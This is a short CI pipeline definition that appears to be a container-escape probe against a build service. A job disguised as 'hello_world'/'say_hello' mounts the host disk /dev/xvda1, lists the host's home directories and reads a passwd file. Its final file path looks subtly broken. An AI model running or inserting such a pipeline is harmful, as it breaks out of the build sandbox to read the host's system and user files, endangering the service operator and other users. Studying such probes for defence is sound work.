pipelines:
  - name: hello_world
    steps:
      - name: say_hello
        type: Bash
        execution:
          onExecute:
            - mkdir /mnt/host; 
            - mount /dev/xvda1 /mnt/host/;
            - cd /mnt/host/
            - ls
            - cd home
            - ls
            - cd ubuntu
            - ls
            - cat mnt/host/etc/passwd
